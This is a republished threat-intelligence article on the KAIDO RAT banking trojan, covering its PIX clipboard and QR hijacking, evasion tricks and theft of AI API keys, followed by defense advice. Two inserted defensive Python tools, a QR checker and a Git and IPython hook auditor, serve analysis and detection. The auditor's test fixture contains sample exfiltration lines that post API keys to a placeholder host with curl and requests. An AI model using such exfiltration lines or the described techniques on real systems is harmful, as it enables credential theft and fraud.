How KAIDO RAT v3.0 Redefines Bank Malware with Modular PIX Hijacking and AI Credential Harvesting

KAIDO RAT v3.0, a .NET 9‑based modular malware suite with over 60 plugins, targets Brazil's PIX payment system, injects malicious QR codes, locks user devices, harvests AI platform credentials, and employs advanced evasion techniques, while the article also offers detailed defense recommendations.


Technical Architecture

KAIDO RAT v3.0 is built on .NET 9 and uses a plugin‑based architecture. Its core components include a headless C2 server, the "Lain" management panel (dashboard, client list, remote shell, file manager), HVNC with GPU capture, remote desktop + camera streaming, and an integrated generator/encryptor called KaidoKrypter that claims full undetectability (FUD).

Delivery methods rely on LNK drops, ClickFix social‑engineering, and HTML smuggling.

Plugin Scale

The suite ships more than 60 functional plugins organized into modules such as evasion (10), Brazil‑specific banking suite (8), data stealers (18), reconnaissance (7), persistence/post‑exploitation (9), and AI credential harvesting (5).

Brazil‑Specific Banking Suite

This is the most dangerous part, targeting the PIX instant‑payment system.

PIX Hijacking Family

PIX Clipper: monitors the clipboard, recognizes CPF, CNPJ, email, and EVP formats, and replaces copied data with attacker‑controlled accounts.

EMV QR Code Poisoner: rewrites QR code payloads in real time, recalculates CRC‑16 checksums, and remains invisible to victims.

PIX Ghost: uses Windows UI automation to hijack transactions without relying on the clipboard, making detection harder.
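Both the clipper and the QR poisoner come down to one question for the payer: is the key about to be paid the key that was intended? The following is an added example, not code from the article or from the malware, showing how a payer-side app or an analyst can check a BR Code (EMV MPM) payload: verify the CRC‑16 in tag 63, pull the PIX key out of the merchant-account template, classify it with the same CPF/CNPJ/EVP/email formats the clipper matches, and compare it to the intended recipient. The sample payload, merchant and key are constructed.

```python
import re
# CRC-16/CCITT-FALSE as specified for EMV MPM (BR Code): poly 0x1021, init 0xFFFF, no reflection.
def crc16_ccitt(data: bytes) -> int:
    crc = 0xFFFF
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1021) & 0xFFFF if crc & 0x8000 else (crc << 1) & 0xFFFF
    return crc

def parse_tlv(s: str) -> dict:
    """Split an EMV 'ID(2) LEN(2) VALUE' string into {id: value}; templates nest the same way."""
    out, i = {}, 0
    while i + 4 <= len(s):
        tag, length = s[i:i + 2], int(s[i + 2:i + 4])
        out[tag] = s[i + 4:i + 4 + length]
        i += 4 + length
    return out

def verify_crc(payload: str) -> bool:
    """Tag 63 (length 04) closes the payload; the CRC covers everything up to and including '6304'."""
    if len(payload) < 8 or payload[-8:-4] != "6304" or not re.fullmatch(r"[0-9A-Fa-f]{4}", payload[-4:]):
        return False
    return crc16_ccitt(payload[:-4].encode()) == int(payload[-4:], 16)

def extract_pix_key(payload: str):
    """Return the PIX key from the merchant-account template (IDs 26-51) that carries the PIX GUI."""
    for tag, value in parse_tlv(payload).items():
        if "26" <= tag <= "51":
            sub = parse_tlv(value)
            if sub.get("00", "").lower() == "br.gov.bcb.pix":
                return sub.get("01")
    return None

KEY_PATTERNS = {"CPF": r"\d{11}", "CNPJ": r"\d{14}", "email": r"[^@\s]+@[^@\s]+\.[^@\s]+",
                "EVP": r"[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}", "phone": r"\+\d{8,15}"}
def key_type(key: str) -> str:
    return next((n for n, p in KEY_PATTERNS.items() if re.fullmatch(p, key)), "unknown")

def check_qr(payload: str, expected_key: str) -> dict:
    """Verdict a payer-side app can show before confirming: checksum intact, key found, key as intended."""
    key = extract_pix_key(payload)
    return {"crc_ok": verify_crc(payload), "key": key, "key_type": key_type(key or ""),
            "recipient_matches": key == expected_key}

# Constructed sample (not a real merchant): the body up to and including '6304', then its CRC.
SAMPLE_KEY = "a1b2c3d4-0000-4000-8000-123456789abc"
SAMPLE_BODY = ("000201" "2658" "0014br.gov.bcb.pix" "0136" + SAMPLE_KEY + "52040000" "5303986"
               "5802BR" "5912LOJA EXEMPLO" "6009SAO PAULO" "62070503***" "6304")
SAMPLE = SAMPLE_BODY + "%04X" % crc16_ccitt(SAMPLE_BODY.encode())
```

A CRC only proves the payload is internally consistent, not that it is genuine: a poisoner that recalculates the checksum, as the article describes, passes verify_crc, so the key shown to the user and recipient_matches are the controls that matter.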

Bank Overlay

Real‑time detection of 28 major Brazilian banks.

Full‑screen fake login windows for 19 bank themes.

Selective keylogging only when a bank window is active.

Device Lock

Locks keyboard, mouse, and Task Manager, forcing the user to pay a ransom.

Advanced Evasion Techniques (10 Modules)

ETW patching of five functions plus AMSI bypass via VEH for double‑layer protection.

Direct system calls (Hell's Gate) and indirect calls to bypass user‑mode hooks.

Sleep‑confusion using XOR encryption and PAGE_NOACCESS to defeat static and dynamic analysis.

Stack deception to evade stack‑based EDR detection.

Additional tricks: thread‑pool execution, six callback methods, PPID spoofing, API hashing, and 19 anti‑VM checks.

Data Stealer Functions (18 Modules)

Comprehensive credential theft covering browsers, passwords, tokens (Discord, Telegram, Steam, Spotify), session data (including WAL lock bypass), NTLM hashes, LSASS memory dumps, SSH/RDP/cloud platform credentials, 13 browser‑extension crypto wallets, MetaMask, ICP‑Brasil A1 certificates with private keys, and Open Banking access for 12 banks.

AI Credential Harvesting Module (New Focus)

Targets AI developers to steal API keys from platforms such as Anthropic (Claude), OpenAI (ChatGPT API), Google Gemini, xAI, and Groq.

Injection Methods

Claude CLI C2 via Discord/Telegram channels.

Claude Desktop MCP hijacking.

Git hook injection.

Jupyter IPython startup hooks.
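Two of the footholds listed above, Git hooks and IPython startup files, run code silently on every checkout or kernel start. The following is an added example, not from the article or from the malware, of a defender-side audit for a developer workstation: it lists every script in those locations and flags the ones that both name one of the API-key environment variables for the platforms the article lists and contain a network call. The variable names and the network regex are assumptions to tune for your estate; the files written by demo() are a constructed fixture, and Claude Desktop MCP configuration is not covered here.

```python
import re
import tempfile
from pathlib import Path

# Env-var names for the platforms the article lists (assumed/constructed list; extend for your estate).
SECRET_RE = re.compile(r"ANTHROPIC_API_KEY|OPENAI_API_KEY|GEMINI_API_KEY|XAI_API_KEY|GROQ_API_KEY")
# A hook or startup file that moves data off-host has no business doing so; treat it as a strong signal.
EXFIL_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|requests\.(get|post)|urlopen|socket\.)", re.I)

def _inspect(path: Path, kind: str) -> dict:
    """Classify one script: which API-key variables it names and whether it talks to the network."""
    text = path.read_text(errors="replace")
    return {"kind": kind, "path": str(path), "network": bool(EXFIL_RE.search(text)),
            "reads_secrets": sorted(set(SECRET_RE.findall(text)))}

def audit_git_hooks(repo: Path) -> list:
    """Every non-.sample file in .git/hooks runs on git events; report each one."""
    hooks = repo / ".git" / "hooks"
    if not hooks.is_dir():
        return []
    return [_inspect(p, "git-hook") for p in sorted(hooks.iterdir())
            if p.is_file() and p.suffix != ".sample"]

def audit_ipython_startup(profile: Path) -> list:
    """IPython runs profile/startup/*.py and *.ipy in every kernel before any user code."""
    startup = profile / "startup"
    if not startup.is_dir():
        return []
    return [_inspect(p, "ipython-startup") for p in sorted(startup.iterdir())
            if p.is_file() and p.suffix in (".py", ".ipy")]

def risky(findings: list) -> list:
    """Highest-confidence subset: names a key variable AND reaches the network."""
    return [f for f in findings if f["reads_secrets"] and f["network"]]

def demo() -> dict:
    """Constructed fixture: a repo with an injected post-checkout hook and a poisoned startup file."""
    root = Path(tempfile.mkdtemp())
    hooks = root / "repo" / ".git" / "hooks"
    hooks.mkdir(parents=True)
    (hooks / "pre-commit.sample").write_text("#!/bin/sh\nexit 0\n")  # git's own template, ignored
    (hooks / "post-checkout").write_text("#!/bin/sh\ncurl -s -d \"$OPENAI_API_KEY\" http://PLACEHOLDER_HOST/\n")
    startup = root / "profile_default" / "startup"
    startup.mkdir(parents=True)
    (startup / "00-first.py").write_text("import os, requests\nrequests.post('http://PLACEHOLDER_HOST', data=os.environ.get('ANTHROPIC_API_KEY'))\n")
    (startup / "10-benign.py").write_text("import pandas as pd\n")
    return {"hooks": audit_git_hooks(root / "repo"), "ipython": audit_ipython_startup(root / "profile_default")}
```

Point audit_git_hooks at each clone and audit_ipython_startup at ~/.ipython/profile_default; anything risky() returns should be diffed against what the developer actually installed.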

Attack Intent

Model abuse for generating malicious content.

Compute theft, as large‑model inference is costly.

Supply‑chain attacks to poison AI training data or outputs.

Reconnaissance Modules (7)

Network mapper.

VPN detector.

Document radar for scanning sensitive files.

Form ghost (CDP hijacking).

Database dump (SQL Server + SQLite).

Certificate store enumeration.

Cryptocurrency memory siphon.

Post‑Exploitation Modules (9)

EDR Killer v2.0 (no PowerShell/cmd dependency).

UAC bypass (three methods).

LPE exploit using miniPlasma and CVE‑2026‑40369.

Kerberoasting and AS‑REP roasting.

COM hijack persistence.

Process hollowing.

Infrastructure

.NET 9 headless server (C2 controller).

.NET 4.8 client.

Single DLL plugin (~7 MB).

AES‑256‑CBC encryption with native stub and ML evasion.

Six layers of obfuscation.

TLS‑based C2 using MessagePack with jitter.

Discord token and Pastebin fallback channel.

nginx + socat redirector.

Defense Recommendations

Endpoint Protection

Prioritize behavior‑based detection over signature‑based.

Review EDR policies to monitor abnormal process termination.

Watch for UI‑automation‑related anomalies.

PIX Security

Enable multi‑factor authentication for high‑value transfers.

Verify recipient information before confirming PIX payments.

Be wary of any request claiming the bank needs remote assistance.

Social‑Engineering Defense

Guard against ClickFix and HTML smuggling attacks.

Strengthen employee security awareness training.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.

Tags: malware analysis, AI credential theft, Banking malware, Evasion techniques, KAIDO RAT, .NET 9, PIX hijacking

Written by

Black & White Path

We are the beacon of the cyber world, a stepping stone on the road to security.